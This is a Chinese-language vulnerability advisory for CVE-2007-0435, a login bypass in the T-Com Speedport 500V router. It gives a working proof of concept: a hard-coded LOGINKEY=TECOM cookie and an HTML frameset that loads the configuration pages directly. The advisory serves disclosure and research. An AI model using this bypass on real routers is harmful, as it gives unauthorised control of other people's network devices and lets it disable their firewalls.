T-Com Speedport绕过登录认证漏洞
发布日期:2007-01-19
更新日期:2007-01-22
受影响系统:T-Com Speedport 500V 1.31
描述:
BUGTRAQ ID:
22160
CVE(CAN) ID:
CVE-2007-0435
Speedport 500V是德国ADSL供应商广泛销售的宽带路由器。
Speedport 500V在处理访问认证的机制上存在漏洞,远程攻击者可能利用此漏洞非授权控制设备。
Speedport在验证用户输入口令时仅仅将cookie设置为LOGINKEY=TECOM内容(硬编码,无法更改)。如果攻击者能够创建这个cookie的话,就可以通过直接调用配置HTML站点绕过口令认证,获得非授权访问,更改系统配置,如禁用防火墙。虽然攻击者在不知道旧口令的情况下旧无法更改系统口令,但可以通过固件升级将口令重置为默认,这样就可以获得完全的系统访问。
<*来源:Virginity (
advisory07@smtp.ru)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=116924174802473&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
创建如下cookie:
Name: LOGINKEY
Content: TECOM
Host: <ipaddress> <- replace this by your routers ipaddress ;)
Path: /
Expires: Never
创建如下html页面并在浏览器中打开:
<html>
<frameset rows="44,*" border=0 frameborder=0 framespacing=0">
<frame src="http://<ipaddress>/b_banner.htm" name="banner">
<frameset cols="170,*" border=0 frameborder=0 framespacing=0>
<frame src="http://<ipaddress>/m_startseite.htm" name="menu">
<frame src="http://<ipaddress>/hcti_startseite.htm" name="hcti">
</frameset>
</frameset>
</html>
这样就可以绕过登陆屏幕,直接访问配置菜单。
建议:
厂商补丁:
T-Com
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.t-com.de/浏览次数:2920
严重程度:0(网友投票)